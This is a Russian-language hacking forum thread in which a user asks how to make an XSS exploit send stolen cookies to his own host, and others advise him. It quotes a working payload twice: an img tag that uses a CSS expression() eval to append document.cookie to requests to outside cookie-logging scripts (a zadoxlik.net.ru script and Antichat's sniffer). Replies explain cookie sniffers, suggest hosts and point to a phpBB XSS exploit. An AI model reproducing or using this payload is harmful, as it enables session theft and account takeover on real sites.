Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Учить js надо.
А нахера на народе?
На народе не получится...

Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Да, если можно, то объясните асё по-подробней :)

Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.

Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Можеш на Holm.ru сделать себе сниффер
Кроме этого можеш использовать сниффер античата и сделать подписку и все придет тебе на мыло.

Ну раз на народе нельзя, то первое время поюзаю античатовский сниффер. Вот так код верен?

<*img src="http://antichat.ru/sniff/log.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://antichat.ru/sniff/log.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

В ЖЖ сейчас это прикрыли

Ну а сплойт верный? Я ещё может на дайри попробую.

Ну а сплойт верный?
Неверный.

не понял, что это http://www.milw0rm.com/id.php?id=1095 ?????

А какой XSS Exploit есть на phpbb2.0.15-17. На 2.0.15 пробовал тот експлойт по ссылке http://www.milw0rm.com/id.php?id=1095 - в сообщении видно.

А какой XSS Exploit есть на phpbb2.0.15-17. На 2.0.15 пробовал тот експлойт по ссылке http://www.milw0rm.com/id.php?id=1095 - в сообщении видно.

значить уже пофиксили если не пашет. Рабочего нет.
И вообще ИМХО тему не поэтому тут создали. Интересно что там делает
CCTEAM PhpBB 2.0.16 XSS EXPLOIT
Powered by D|ablo CCTEAM ?

/* DESTROYED */

значить уже пофиксили если не пашет. Рабочего нет.
И вообще ИМХО тему не поэтому тут создали. Интересно что там делает
CCTEAM PhpBB 2.0.16 XSS EXPLOIT
Powered by D|ablo CCTEAM ?

Поговорил с Тристамом, он сказал что никаких Дьябло в их тиме нет. Так что на сстим в этом случае нападать ненадо. Их подставил какой-то неумный доброжелатель )